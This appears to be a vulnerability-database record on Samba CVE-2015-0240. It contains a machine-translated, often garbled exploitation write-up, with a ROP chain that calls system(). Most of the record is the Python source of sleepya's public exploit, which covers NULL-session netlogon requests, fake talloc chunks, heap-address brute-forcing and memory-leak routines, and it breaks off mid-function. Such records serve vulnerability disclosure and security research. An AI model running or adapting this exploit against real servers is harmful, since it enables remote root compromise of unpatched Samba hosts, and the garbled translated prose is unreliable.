is usually to run with root privileges, if the vulnerability can be used to achieve arbitrary code execution, an attacker can remotely obtain system root privileges, the harm is extremely serious, and therefore the vulnerability of CVSS score also reached the 1 to 0.\n\nThe vulnerability of the basic principle is to stack on the uninitialized pointer is passed in TALLOC_FREE()function. Want to take advantage of this vulnerability, you first need to control on the stack uninitialized data, this and the compilation the generated binary file stack layout related. So few foreign security researchers for different Linux distributions the binary file to do the analysis, wherein the Worawit Wang([@sleepya_](<https://twitter.com/sleepya/_>))gives better results, he confirmed on Ubuntu 12.04 x86 (Samba 3.6.3)and Debian 7 x86 (Samba 3.6.6), this vulnerability can be used to achieve remote code arbitrary execution, reference [2] in the comments. After England established the security company NCC Group of researchers shows exploit the idea of [4], but also not to use details and exploit code. Herein a detailed analysis and to achieve a Ubuntu 12.04 x86\uff08Debian 7 x86 case is similar to the platform under the Samba service end of the remote code that any execution of exploit it.\n\n## [](<http://blog.chaitin.com/samba_exploit_cve-2015-0240/#h3_ \u6f0f\u6d1e \u7b80\u4ecb>)3 vulnerability profile\n\nThere have been many articles shows vulnerability analysis [3], here only do a brief introduction. The vulnerability occurs in a function _netr_ServerPasswordSet (), local variable creds was originally desired by netr_creds_server_step_check() function to initialize, but if the structure of the input such that the netr_creds_server_step_check() fails, it can lead to creds is not initialized were introduced in the TALLOC_FREE()function:\n\n\nNTSTATUS _netr_ServerPasswordSet(struct pipes_struct *p, struct netr_ServerPasswordSet *r)\n{\nNTSTATUS status = NT_STATUS_OK; int i; struct netlogon_creds_CredentialState *creds;\n[...]\nstatus = netr_creds_server_step_check(p, p->mem_ctx, r->in. computer_name, r->in. credential, r->out. return_authenticator, &creds);\nunbecome_root(); if (! NT_STATUS_IS_OK(status)) {\n[...]\nTALLOC_FREE(creds); return status;\n}\n\n## [](<http://blog.chaitin.com/samba_exploit_cve-2015-0240/#h4_ \u6f0f\u6d1e \u5229\u7528>)4 exploit\n\nWe first look at the smbd binary which turned on what protection mechanisms:\n\n\n$ checksec.sh --file smbd\nRELRO STACK CANARY NX PIE RPATH RUNPATH FILE\nFull RELRO Canary found NX enabled PIE enabled No RPATH No RUNPATH smbd\n\nCompiler all be able to add protection mechanisms are used, the most attention is required on the PIE of protection, so if you want to use the binary itself code fragment to ROP or call the import function, you must first know the program itself to load the address.\n\n### [](<http://blog.chaitin.com/samba_exploit_cve-2015-0240/#h4.1_ \u4efb\u610f \u5730\u5740 free>)4.1 any address Free\n\nTo exploit this vulnerability, you first need to find a control flow, to be able to control on the stack not initialized the pointer creds, so that we can achieve arbitrary address to call TALLOC_FREE () on. According to@sleepya_ the PoC, we already know, in Ubuntu 12.04 and Debian 7 x86 system, NetrServerPasswordSet request among PrimaryName the ReferentID domain happens to fall in a stack on the uninitialized pointer creds position. So we can by constructing ReferentID to achieve any address Free. PoC code is as follows:\n\n\nprimaryName = nrpc. PLOGONSRV_HANDLE() # ReferentID field of PrimaryName controls the uninitialized value of creds in ubuntu 12.04 32bit primaryName. fields['ReferentID'] = 0x41414141 \n\n### [](<http://blog.chaitin.com/samba_exploit_cve-2015-0240/#h4.2_ \u63a7\u5236 eip>)4.2 control EIP\n\nWith any address Free, we can think of a way to let the TALLOC_FREE()to release our control of the memory block, but we do not know we can control the memory address of the DCERPC request of the data stored in the heap. We can brute-force the stack address, because the smbd process using the fork the way to handle each connection, the memory space of the layout is unchanged. In addition, we may be in a heap on a large number of arrangement of the TALLOC memory blocks, to improve the hit rate, as far as possible to reduce the enumeration space. We first assume that already know the heap address, first take a look at how to structure TALLOC memory block to hijack the EIP. We need to get to know TALLOC_FREE (). First take a look at the TALLOC memory blocks of the structure:\n\n\nstruct talloc_chunk { struct talloc_chunk *next, *prev; struct talloc_chunk *parent, *child; struct talloc_reference_handle *refs;\ntalloc_destructor_t destructor; const char *name;\nsize_t size; unsigned flags; void *pool; 8 bytes padding;\n};\n\nIn order to meet the 1 6-byte aligned, this structure at the end there are 8 bytes of padding, so that the talloc_chunk structure a total of 4 to 8 bytes. In this structure, the destructor is a function pointer, we can be of any configuration. First take a look at the TALLOC_FREE()this macro expands to the code:\n\n\n_PUBLIC_ int _talloc_free(void *ptr, const char *location)\n{ struct talloc_chunk *tc; if (unlikely(ptr == NULL)) { return -1;\n}\ntc = talloc_chunk_from_ptr(ptr);\n...\n}\n\n_talloc_free()and call the talloc_chunk_from_ptr (), this function is used to convert the memory pointer when the allocation is returned to the user using the pointer ptr into into the talloc_chunk pointer.\n\n\n/* panic if we get a bad magic value */ static inline struct talloc_chunk *talloc_chunk_from_ptr(const void *ptr)\n{ const char *pp = (const char *)ptr; struct talloc_chunk *tc = discard_const_p(struct talloc_chunk, pp - TC_HDR_SIZE); if (unlikely((tc->flags & (TALLOC_FLAG_FREE | ~0xF)) != TALLOC_MAGIC)) { if ((tc->flags & (~0xFFF)) == TALLOC_MAGIC_BASE) {\ntalloc_abort_magic(tc->flags & (~0xF)); return NULL;\n} if (tc->flags & TALLOC_FLAG_FREE) {\ntalloc_log(\"talloc: access after free error- first free may be at %s\\n\", tc->name);\ntalloc_abort_access_after_free(); return NULL;\n} else {\ntalloc_abort_unknown_value(); return NULL;\n}\n} return tc;\n}\n\nThis function simply takes the user memory pointer is subtracted TC_HDR_SIZE and return, TC_HDR_SIZE is talloc_chunk size 4 8, but we need to meet the tc->flags check, which is set to the correct Magic Number, otherwise the function cannot return the correct pointer. Next, we continue to see _talloc_free()function:\n\n\n_PUBLIC_ int _talloc_free(void *ptr, const char *location)\n{\n...\ntc = talloc_chunk_from_ptr(ptr); if (unlikely(tc->refs != NULL)) { struct talloc_reference_handle *h; if (talloc_parent(ptr) == null_context && tc->refs->next == NULL) { return talloc_unlink(null_context, ptr);\n}\ntalloc_log(\"ERROR: talloc_free with references at %s\\n\",\nlocation); for (h=tc->refs; h; h=h->next) {\ntalloc_log(\"\\treference at %s\\n\",\nh->location);\n} return -1;\n} return _talloc_free_internal(ptr, location);\n}\n\nIf tc->refs not equal to NULL, then enter the if branch: in order to get inside the first if branch is not linked, we need to put the tc->parent pointer is set to NULL; immediately after the for Loop and requires that we let tc->refs point to a legitimate list, there are some complex. We'll see if tc->refs for the NULL case, i.e. the program proceeds to a _talloc_free_internal()function:\n\n\nstatic inline int _talloc_free_internal(void *ptr, const char *location)\n{\n... if (unlikely(tc->flags & TALLOC_FLAG_LOOP)) { /* we have a free loop - stop looping */ return 0;\n} if (unlikely(tc->destructor)) {\ntalloc_destructor_t d = tc->destructor; if (d == (talloc_destructor_t)-1) { return -1;\n}\ntc->destructor = (talloc_destructor_t)-1; if (d(ptr) == -1) { // call destructor tc->destructor = d; return -1;\n}\ntc->destructor = NULL;\n}\n...\n}\n\nWe omitted the function has no need to consider part in the above function, we have seen talloc_chunk the destructor to be called up, but before that there are some checks: first if, we can not be in the flags set in the TALLOC_FLAG_LOOP; in the second if, the destructor if set to -1, the function returns -1, the program will not crash if the destructor is set to another illegal address, then the program will crash and exit. We can use this feature to verify the exhaustive heap address is accurate: we are in the exhaustive when the destructor is set to-1, When you find one to TALLOC_FREE()the address does not let the program crash requests have returned, then the destructor is set to an illegal address, if the program at this time to crash, then we find that the address is correct. Now we summarize what we need to construct the chunk should satisfy the conditions:\n\n\nstruct talloc_chunk { struct talloc_chunk *next, *prev; // no request struct talloc_chunk *parent, *child; // no request struct talloc_reference_handle *refs; // refs = 0 talloc_destructor_t destructor; // destructor = -1: (No Crash), others: is controled EIP const char *name;\nsize_t size; unsigned flags; // Condition 1: flags & (TALLOC_FLAG_FREE | ~0xF)) == TALLOC_MAGIC // condition 2: tc->flags & TALLOC_FLAG_LOOP == False void *pool; // not required 8 bytes padding; // not required };\n\nSo far, we already know how through the structure of the chunk passed to the TALLOC_FREE()to control the EIP.\n\n### [](<http://blog.chaitin.com/samba_exploit_cve-2015-0240/#h4.3_ \u7a77 \u4e3e \u5806 \u5730\u5740>)4.3 exhaustive heap address\n\nAfter modifying the PoC and combined with the gdb debugging found that, we can use the new password to construct a large number of the chunk corresponding to the PoC in the uasNewPass['Data'] is. Although sent to the Samba of the request which have a lot of data stored in the heap, among such as username and password, refer to [2], but much of the data required to comply with WSTR encoding, can not be passed to any character. In order to improve the exhaustive heap address of the efficiency, we use [4] proposed the idea of using only contains the refs, a destructor, name, size, flags this the 5 domain of the compressed chunk, from 4 to 8 bytes reduced to 2 0 Byte, so in our exhaustive only when the need for each address of the exhaustive 5 offset instead of the original 1 2. Compressing the chunk of the injection and the actual talloc_chunk structure of the corresponding relationship as shown below.\n\n! [image](/Article/UploadPic/2015-4/2 0 1 5 4 1 4 1 2 2 8 7 3 7 4. png)\n\nchunk injection quantity will also affect to the exhaustive efficiency. If the in-memory injection of the chunk more, you'll need to enumerate the space will be reduced, but each enumeration the network transport, the program of the input processing and the like factors of the resulting time overhead also increases, so the need according to the actual situation to select a compromise value. In addition, in our implementation of the exploit, the use of a process pool to achieve parallel enumeration, improved exhaustive efficiency.\n\n### [](<http://blog.chaitin.com/samba_exploit_cve-2015-0240/#h4.4_rop>)4.4 ROP\n\nTo achieve the ROP, we also need to enumerate the Samba program loads the base address. Due to the address randomization protection mechanisms of the minimum granularity of memory page, so we press the pages to enumerate can 0x1000 bytes. We in the platform, a large number of test address space may range, roughly 0x200 kinds of possible scenarios can be accepted. Now we can only be configured through the destructor to control once the EIP, in order to achieve the ROP, you first need to do stack migration stack pivot we in the samba binary is found in the following gadget: a\n\n\n0x000a6d7c: lea esp, dword [ecx-0x04] ; ret ; \n\nSince the control of the EIP site, the ecx-0x4 just point to the chunk name field, so we can see from the name field to start ROP. By setting a pop4ret pop eax ; pop esi ; pop edi ; pop ebp ; ret; the gadget, you can make esp point to the next compressed chunk in the name field, followed down, until ESP came up to us ejection of the memory at the end, where we can have unlimited write ROP Payload in.\n\n[4] did not give a specific stack migration of the gadget, but according to the text given in the figure shown, it can be speculated that the NCC Group of researchers using the same gadget is.\n\n### [](<http://blog.chaitin.com/samba_exploit_cve-2015-0240/#h4.5_ \u4efb\u610f \u4ee3\u7801 \u6267\u884c>)4.5 arbitrary code execution\n\nPay attention to the smbd program to import the system function, therefore we can directly call the system of the PLT address to execute arbitrary commands. But how to a write command, if used in the stack is arranged in the command, currently we only know the compression of the chunk address, but of which only 4 bytes are available, so consider the call to snprintf, to the bss section in the byte-by-byte write command, this way you can perform arbitrary-length command. Note that, in the call to snprintf and system, byTo binary using address-independent code, PIC, and need to put the GOT table address is restored to the ebx register. Generate a ROP Payload of the Python code is as follows:\n\n\n# ebx => got rop = l32(popebx) + l32(got) # write cmd to bss, fmt == \"%c\" for i in xrange(len(cmd)):\nc = cmd[i]\nrop += l32(snprintf) + l32(pop4ret)\nrop += l32(bss + i) + l32(2) + l32(fmt) + l32(ord(c)) # system(cmd) rop += l32(system) + 'leet' + l32(bss)\n\n[4] The method used is a conventional mmap() + memcpy()and then execute shellcode the way, you can achieve the same effect.\n\n### [](<http://blog.chaitin.com/samba_exploit_cve-2015-0240/#h4.6_exploit \u5b8c\u6574 \u4ee3\u7801>)4.6 exploit the full code\n\n[samba-exploit.py](<http://blog.chaitin.com/samba_exploit_cve-2015-0240/samba-exploit.py>)\n\n## [](<http://blog.chaitin.com/samba_exploit_cve-2015-0240/#h5_ \u53c2\u8003\u8d44\u6599>)5 references\n\n1. [Samba vulnerability (CVE-2 0 1 5-0 2 4 0)](<https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/?spm=0.0.0.0.e8Vbd3>)\n2. [PoC for Samba vulnerabilty (CVE-2 0 1 5-0 2 4 0)](<https://gist.github.com/worawit/33cc5534cb555a0b710b>)\n3. [Samba _netr_ServerPasswordSet Expoitability Analysis](<https://www.nccgroup.trust/en/blog/2015/03/samba-_netr_serverpasswordset-expoitability-analysis/>)\n4. [Exploiting Samba CVE-2 0 1 5-0 2 4 0 on Ubuntu 12.04 and Debian 7 3 2-bit](<https://www.nccgroup.trust/en/blog/2015/03/exploiting-samba-cve-2015-0240-on-ubuntu-1204-and-debian-7-32-bit/>)\n\n", "modified": "2015-04-14T00:00:00", "published": "2015-04-14T00:00:00", "id": "MYHACK58:62201561147", "href": "http://www.myhack58.com/Article/html/3/62/2015/61147.htm", "type": "myhack58", "title": "Samba CVE-2 0 1 5-0 2 4 0 remote code execution exploit practice-vulnerability warning-the black bar safety net", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-04T04:14:01", "bulletinFamily": "exploit", "description": "Samba < 3.6.2 x86 - PoC. CVE-2015-0240. Dos exploit for linux platform", "modified": "2015-04-13T00:00:00", "published": "2015-04-13T00:00:00", "id": "EDB-ID:36741", "href": "https://www.exploit-db.com/exploits/36741/", "type": "exploitdb", "title": "Samba < 3.6.2 x86 - PoC", "sourceData": "#!/usr/bin/python\r\n\"\"\"\r\nExploit for Samba vulnerabilty (CVE-2015-0240) by sleepya\r\n\r\nThe exploit only targets vulnerable x86 smbd <3.6.24 which 'creds' is controlled by \r\nReferentID field of PrimaryName (ServerName). That means '_talloc_zero()'\r\nin libtalloc does not write a value on 'creds' address.\r\n\r\nReference:\r\n- https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/\r\n\r\nNote:\r\n- heap might be changed while running exploit, need to try again (with '-hs' or '-pa' option)\r\n if something failed\r\n\r\nFind heap address:\r\n- ubuntu PIE heap start range: b7700000 - b9800000\r\n- start payload size: the bigger it is the lesser connection and binding time.\r\n but need more time to shrink payload size\r\n- payload is too big to fit in freed small hole. so payload is always at end\r\n of heap\r\n- start bruteforcing heap address from high memory address to low memory address\r\n to prevent 'creds' pointed to real heap chunk (also no crash but not our payload)\r\n\r\nLeak info:\r\n- heap layout is predictable because talloc_stackframe_pool(8192) is called after \r\n accepted connection and fork but before calling smbd_server_connection_loop_once()\r\n- before talloc_stackframe_pool(8192) is called, there are many holes in heap\r\n but their size are <8K. so pool is at the end of heap at this time\r\n- many data that allocated after talloc_stackframe_pool(8192) are allocated in pool.\r\n with the same pattern of request, the layout in pool are always the same.\r\n- many data are not allocated in pool but fit in free holes. so no small size data are\r\n allocated after pool.\r\n- normally there are only few data block allocated after pool.\r\n - pool size: 0x2048 (included glibc heap header 4 bytes)\r\n - a table that created in giconv_open(). the size is 0x7f88 (included glibc heap header 4 bytes)\r\n - p->in_data.pdu.data. the size is 0x10e8 (included glibc heap header 4 bytes)\r\n - this might not be allocated here because its size might fit in freed hole\r\n - all fragment should be same size to prevent talloc_realloc() changed pdu.data size\r\n - so last fragment should be padded\r\n - ndr DATA_BLOB. the size is 0x10d0 (included glibc heap header 4 bytes)\r\n - this might not be allocated here because its size might fit in freed hole\r\n - p->in_data.data.data. the size is our netlogon data\r\n - for 8K payload, the size is 0x2168 (included glibc heap header 4 bytes)\r\n - this data is allocated by realloc(), grew by each fragment. so this memory\r\n block is not allocated by mmapped even the size is very big.\r\n- pool layout for interested data\r\n - r->out offset from pool (talloc header) is 0x13c0\r\n - r->out.return_authenticator offset from pool is 0x13c0+0x18\r\n - overwrite this (with link unlink) to leak info in ServerPasswordSet response\r\n - smb_request offset from pool (talloc header) is 0x11a0\r\n - smb_request.sconn offset from pool is 0x11a0+0x3c\r\n - socket fd is at smb_request.sconn address (first struct member)\r\n- more shared folder in configuration, more freed heap holes\r\n - only if there is no or one shared, many data might be unexpected allocated after pool.\r\n have to get that extra offset or bruteforce it\r\n\r\n\r\nMore exploitation detail in code (comment) ;)\r\n\"\"\"\r\n\r\nimport sys\r\nimport time\r\nfrom struct import pack,unpack\r\nimport argparse\r\n\r\nimport impacket\r\nfrom impacket.dcerpc.v5 import transport, nrpc\r\nfrom impacket.dcerpc.v5.ndr import NDRCALL\r\nfrom impacket.dcerpc.v5.dtypes import WSTR\r\n\r\n\r\nclass Requester:\r\n \"\"\"\r\n put all smb request stuff into class. help my editor folding them\r\n \"\"\"\r\n \r\n # impacket does not implement NetrServerPasswordSet\r\n # 3.5.4.4.6 NetrServerPasswordSet (Opnum 6)\r\n class NetrServerPasswordSet(NDRCALL):\r\n opnum = 6\r\n structure = (\r\n ('PrimaryName',nrpc.PLOGONSRV_HANDLE),\r\n ('AccountName',WSTR),\r\n ('SecureChannelType',nrpc.NETLOGON_SECURE_CHANNEL_TYPE),\r\n ('ComputerName',WSTR),\r\n ('Authenticator',nrpc.NETLOGON_AUTHENTICATOR),\r\n ('UasNewPassword',nrpc.ENCRYPTED_NT_OWF_PASSWORD),\r\n )\r\n # response is authenticator (8 bytes) and error code (4 bytes)\r\n\r\n # size of each field in sent packet\r\n req_server_handle_size = 16\r\n req_username_hdr_size = 4 + 4 + 4 + 2 # max count, offset, actual count, trailing null\r\n req_sec_type_size = 2\r\n req_computer_size = 4 + 4 + 4 + 2\r\n req_authenticator_size = 8 + 2 + 4\r\n req_new_pwd_size = 16\r\n req_presize = req_server_handle_size + req_username_hdr_size + req_sec_type_size + req_computer_size + req_authenticator_size + req_new_pwd_size\r\n \r\n samba_rpc_fragment_size = 4280\r\n netlogon_data_fragment_size = samba_rpc_fragment_size - 8 - 24 # 24 is dcerpc header size\r\n \r\n def __init__(self):\r\n self.target = None\r\n self.dce = None\r\n \r\n sessionKey = '\\x00'*16\r\n # prepare ServerPasswordSet request\r\n authenticator = nrpc.NETLOGON_AUTHENTICATOR()\r\n authenticator['Credential'] = nrpc.ComputeNetlogonCredential('12345678', sessionKey)\r\n authenticator['Timestamp'] = 10\r\n\r\n uasNewPass = nrpc.ENCRYPTED_NT_OWF_PASSWORD()\r\n uasNewPass['Data'] = '\\x00'*16\r\n\r\n self.serverName = nrpc.PLOGONSRV_HANDLE()\r\n # ReferentID field of PrimaryName controls the uninitialized value of creds\r\n self.serverName.fields['ReferentID'] = 0\r\n \r\n self.accountName = WSTR()\r\n\r\n request = Requester.NetrServerPasswordSet()\r\n request['PrimaryName'] = self.serverName\r\n request['AccountName'] = self.accountName\r\n request['SecureChannelType'] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.WorkstationSecureChannel\r\n request['ComputerName'] = '\\x00'\r\n request['Authenticator'] = authenticator\r\n request['UasNewPassword'] = uasNewPass\r\n self.request = request\r\n \r\n def set_target(self, target):\r\n self.target = target\r\n \r\n def set_payload(self, s, pad_to_size=0):\r\n if pad_to_size > 0:\r\n s += '\\x00'*(pad_to_size-len(s))\r\n pad_size = 0\r\n if len(s) < (16*1024+1):\r\n ofsize = (len(s)+self.req_presize) % self.netlogon_data_fragment_size\r\n if ofsize > 0:\r\n pad_size = self.netlogon_data_fragment_size - ofsize\r\n \r\n self.accountName.fields['Data'] = s+'\\x00'*pad_size+'\\x00\\x00'\r\n self.accountName.fields['MaximumCount'] = None\r\n self.accountName.fields['ActualCount'] = None\r\n self.accountName.data = None # force recompute\r\n \r\n set_accountNameData = set_payload\r\n\r\n def get_dce(self):\r\n if self.dce is None or self.dce.lostconn:\r\n rpctransport = transport.DCERPCTransportFactory(r'ncacn_np:%s[\\PIPE\\netlogon]' % self.target)\r\n rpctransport.set_credentials('','') # NULL session\r\n rpctransport.set_dport(445)\r\n # force to 'NT LM 0.12' only\r\n rpctransport.preferred_dialect('NT LM 0.12')\r\n \r\n self.dce = rpctransport.get_dce_rpc()\r\n self.dce.connect()\r\n self.dce.bind(nrpc.MSRPC_UUID_NRPC)\r\n self.dce.lostconn = False\r\n return self.dce\r\n\r\n def get_socket(self):\r\n return self.dce.get_rpc_transport().get_socket()\r\n \r\n def force_dce_disconnect(self):\r\n if not (self.dce is None or self.dce.lostconn):\r\n self.get_socket().close()\r\n self.dce.lostconn = True\r\n\r\n def request_addr(self, addr):\r\n self.serverName.fields['ReferentID'] = addr\r\n \r\n dce = self.get_dce()\r\n try:\r\n dce.call(self.request.opnum, self.request)\r\n answer = dce.recv()\r\n return unpack(\"<IIII\", answer)\r\n except impacket.nmb.NetBIOSError as e:\r\n if e.args[0] != 'Error while reading from remote':\r\n raise\r\n dce.lostconn = True\r\n return None\r\n\r\n # call with no read\r\n def call_addr(self, addr):\r\n self.serverName.fields['ReferentID'] = addr\r\n \r\n dce = self.get_dce()\r\n try:\r\n dce.call(self.request.opnum, self.request)\r\n return True\r\n except impacket.nmb.NetBIOSError as e:\r\n if e.args[0] != 'Error while reading from remote':\r\n raise\r\n dce.lostconn = True\r\n return False\r\n \r\n def force_recv(self):\r\n dce = self.get_dce()\r\n return dce.get_rpc_transport().recv(forceRecv=True)\r\n\r\n def request_check_valid_addr(self, addr):\r\n answers = self.request_addr(addr)\r\n if answers is None:\r\n return False # connection lost\r\n elif answers[3] != 0:\r\n return True # error, expected\r\n else:\r\n raise Error('Unexpected result')\r\n\r\n\r\n# talloc constants\r\nTALLOC_MAGIC = 0xe8150c70 # for talloc 2.0\r\nTALLOC_FLAG_FREE = 0x01\r\nTALLOC_FLAG_LOOP = 0x02\r\nTALLOC_FLAG_POOL = 0x04\r\nTALLOC_FLAG_POOLMEM = 0x08\r\n\r\nTALLOC_HDR_SIZE = 0x30 # for 32 bit\r\n\r\nflag_loop = TALLOC_MAGIC | TALLOC_FLAG_LOOP # for checking valid address\r\n\r\n# Note: do NOT reduce target_payload_size less than 8KB. 4KB is too small buffer. cannot predict address.\r\nTARGET_PAYLOAD_SIZE = 8192\r\n\r\n########\r\n# request helper functions\r\n########\r\n\r\n# only one global requester\r\nrequester = Requester()\r\n\r\ndef force_dce_disconnect():\r\n requester.force_dce_disconnect()\r\n\r\ndef request_addr(addr):\r\n return requester.request_addr(addr)\r\n\r\ndef request_check_valid_addr(addr):\r\n return requester.request_check_valid_addr(addr)\r\n\r\ndef set_payload(s, pad_to_size=0):\r\n requester.set_payload(s, pad_to_size)\r\n\r\ndef get_socket():\r\n return requester.get_socket()\r\n \r\ndef call_addr(addr):\r\n return requester.call_addr(addr)\r\n\r\ndef force_recv():\r\n return requester.force_recv()\r\n \r\n########\r\n# find heap address\r\n########\r\n\r\n# only refs MUST be NULL, other never be checked\r\nfake_chunk_find_heap = pack(\"<IIIIIIII\",\r\n 0, 0, 0, 0, # refs\r\n flag_loop, flag_loop, flag_loop, flag_loop,\r\n)\r\n\r\ndef find_valid_heap_addr(start_addr, stop_addr, payload_size, first=False):\r\n \"\"\"\r\n below code can be used for checking valid heap address (no crash)\r\n\r\n if (unlikely(tc->flags & TALLOC_FLAG_LOOP)) {\r\n /* we have a free loop - stop looping */\r\n return 0;\r\n }\r\n \"\"\"\r\n global fake_chunk_find_heap\r\n payload = fake_chunk_find_heap*(payload_size/len(fake_chunk_find_heap))\r\n set_payload(payload)\r\n addr_step = payload_size\r\n addr = start_addr\r\n i = 0\r\n while addr > stop_addr:\r\n if i == 16:\r\n print(\" [*]trying addr: {:x}\".format(addr))\r\n i = 0\r\n \r\n if request_check_valid_addr(addr):\r\n return addr\r\n if first:\r\n # first time, the last 16 bit is still do not know\r\n # have to do extra check\r\n if request_check_valid_addr(addr+0x10):\r\n return addr+0x10\r\n addr -= addr_step\r\n i += 1\r\n return None\r\n\r\ndef find_valid_heap_exact_addr(addr, payload_size):\r\n global fake_chunk_find_heap\r\n fake_size = payload_size // 2\r\n while fake_size >= len(fake_chunk_find_heap):\r\n payload = fake_chunk_find_heap*(fake_size/len(fake_chunk_find_heap))\r\n set_payload(payload, payload_size)\r\n if not request_check_valid_addr(addr):\r\n addr -= fake_size\r\n fake_size = fake_size // 2\r\n \r\n set_payload('\\x00'*16 + pack(\"<I\", flag_loop), payload_size)\r\n # because glibc heap is align by 8\r\n # so the last 4 bit of address must be 0x4 or 0xc\r\n if request_check_valid_addr(addr-4):\r\n addr -= 4\r\n elif request_check_valid_addr(addr-0xc):\r\n addr -= 0xc\r\n else:\r\n print(\" [-] bad exact addr: {:x}\".format(addr))\r\n return 0\r\n \r\n print(\" [*] checking exact addr: {:x}\".format(addr))\r\n \r\n if (addr & 4) == 0:\r\n return 0\r\n \r\n # test the address\r\n \r\n # must be invalid (refs is AccountName.ActualCount)\r\n set_payload('\\x00'*12 + pack(\"<I\", flag_loop), payload_size)\r\n if request_check_valid_addr(addr-4):\r\n print(' [-] request_check_valid_addr(addr-4) failed')\r\n return 0\r\n # must be valid (refs is AccountName.Offset)\r\n # do check again if fail. sometimes heap layout is changed\r\n set_payload('\\x00'*8 + pack(\"<I\", flag_loop), payload_size)\r\n if not request_check_valid_addr(addr-8) and not request_check_valid_addr(addr-8) :\r\n print(' [-] request_check_valid_addr(addr-8) failed')\r\n return 0\r\n # must be invalid (refs is AccountName.MaxCount)\r\n set_payload('\\x00'*4 + pack(\"<I\", flag_loop), payload_size)\r\n if request_check_valid_addr(addr-0xc):\r\n print(' [-] request_check_valid_addr(addr-0xc) failed')\r\n return 0\r\n # must be valid (refs is ServerHandle.ActualCount)\r\n # do check again if fail. sometimes heap layout is changed\r\n set_payload(pack(\"<I\", flag_loop), payload_size)\r\n if not request_check_valid_addr(addr-0x10) and not request_check_valid_addr(addr-0x10):\r\n print(' [-] request_check_valid_addr(addr-0x10) failed')\r\n return 0\r\n \r\n return addr\r\n\r\ndef find_payload_addr(start_addr, start_payload_size, target_payload_size):\r\n print('[*] bruteforcing heap address...')\r\n\r\n start_addr = start_addr & 0xffff0000\r\n \r\n heap_addr = 0\r\n while heap_addr == 0:\r\n # loop from max to 0xb7700000 for finding heap area\r\n # offset 0x20000 is minimum offset from heap start to recieved data in heap\r\n stop_addr = 0xb7700000 + 0x20000\r\n good_addr = None\r\n payload_size = start_payload_size\r\n while payload_size >= target_payload_size:\r\n force_dce_disconnect()\r\n found_addr = None\r\n for i in range(3):\r\n found_addr = find_valid_heap_addr(start_addr, stop_addr, payload_size, good_addr is None)\r\n if found_addr is not None:\r\n break\r\n if found_addr is None:\r\n # failed\r\n good_addr = None\r\n break\r\n good_addr = found_addr\r\n print(\" [*] found valid addr ({:d}KB): {:x}\".format(payload_size//1024, good_addr))\r\n start_addr = good_addr\r\n stop_addr = good_addr - payload_size + 0x20\r\n payload_size //= 2\r\n\r\n if good_addr is not None:\r\n # try 3 times to find exact address. if address cannot be found, assume\r\n # minimizing payload size is not correct. start minimizing again\r\n for i in range(3):\r\n heap_addr = find_valid_heap_exact_addr(good_addr, target_payload_size)\r\n if heap_addr != 0:\r\n break\r\n force_dce_disconnect()\r\n \r\n if heap_addr == 0:\r\n print(' [-] failed to find payload adress')\r\n # start from last good address + some offset\r\n start_addr = (good_addr + 0x10000) & 0xffff0000\r\n print('[*] bruteforcing heap adress again from {:x}'.format(start_addr))\r\n \r\n payload_addr = heap_addr - len(fake_chunk_find_heap)\r\n print(\" [+] found payload addr: {:x}\".format(payload_addr))\r\n return payload_addr\r\n\r\n\r\n########\r\n# leak info\r\n########\r\n\r\ndef addr2utf_prefix(addr):\r\n def is_badchar(v):\r\n return (v >= 0xd8) and (v <= 0xdf)\r\n \r\n prefix = 0 # safe\r\n if is_badchar((addr)&0xff) or is_badchar((addr>>16)&0xff):\r\n prefix |= 2 # cannot have prefix\r\n if is_badchar((addr>>8)&0xff) or is_badchar((addr>>24)&0xff):\r\n prefix |= 1 # must have prefix\r\n return prefix\r\n \r\ndef leak_info_unlink(payload_addr, next_addr, prev_addr, retry=True, call_only=False):\r\n \"\"\"\r\n Note:\r\n - if next_addr and prev_addr are not zero, they must be writable address\r\n because of below code in _talloc_free_internal()\r\n if (tc->prev) tc->prev->next = tc->next;\r\n if (tc->next) tc->next->prev = tc->prev;\r\n \"\"\"\r\n # Note: U+D800 to U+DFFF is reserved (also bad char for samba)\r\n # check if '\\x00' is needed to avoid utf16 badchar\r\n prefix_len = addr2utf_prefix(next_addr) | addr2utf_prefix(prev_addr)\r\n if prefix_len == 3:\r\n return None # cannot avoid badchar\r\n if prefix_len == 2:\r\n prefix_len = 0\r\n\r\n fake_chunk_leak_info = pack(\"<IIIIIIIIIIII\",\r\n next_addr, prev_addr, # next, prev\r\n 0, 0, # parent, children\r\n 0, 0, # refs, destructor\r\n 0, 0, # name, size\r\n TALLOC_MAGIC | TALLOC_FLAG_POOL, # flag\r\n 0, 0, 0, # pool, pad, pad\r\n )\r\n payload = '\\x00'*prefix_len+fake_chunk_leak_info + pack(\"<I\", 0x80000) # pool_object_count\r\n set_payload(payload, TARGET_PAYLOAD_SIZE)\r\n if call_only:\r\n return call_addr(payload_addr + TALLOC_HDR_SIZE + prefix_len)\r\n \r\n for i in range(3 if retry else 1):\r\n try:\r\n answers = request_addr(payload_addr + TALLOC_HDR_SIZE + prefix_len)\r\n except impacket.dcerpc.v5.rpcrt.Exception:\r\n print(\"impacket.dcerpc.v5.rpcrt.Exception\")\r\n answers = None\r\n force_dce_disconnect()\r\n if answers is not None:\r\n # leak info must have next or prev address\r\n if (answers[1] == prev_addr) or (answers[0] == next_addr):\r\n break\r\n #print('{:x}, {:x}, {:x}, {:x}'.format(answers[0], answers[1], answers[2], answers[3]))\r\n answers = None # no next or prev in answers => wrong answer\r\n force_dce_disconnect() # heap is corrupted, disconnect it\r\n \r\n return answers\r\n \r\ndef leak_info_addr(payload_addr, r_out_addr, leak_addr, retry=True):\r\n # leak by replace r->out.return_authenticator pointer\r\n # Note: because leak_addr[4:8] will be replaced with r_out_addr\r\n # only answers[0] and answers[2] are leaked\r\n return leak_info_unlink(payload_addr, leak_addr, r_out_addr, retry)\r\n\r\ndef leak_info_addr2(payload_addr, r_out_addr, leak_addr, retry=True):\r\n # leak by replace r->out.return_authenticator pointer\r\n # Note: leak_addr[0:4] will be replaced with r_out_addr\r\n # only answers[1] and answers[2] are leaked\r\n return leak_info_unlink(payload_addr, r_out_addr-4, leak_addr-4, retry)\r\n\r\ndef leak_uint8t_addr(payload_addr, r_out_addr, chunk_addr):\r\n # leak name field ('uint8_t') in found heap chunk\r\n # do not retry this 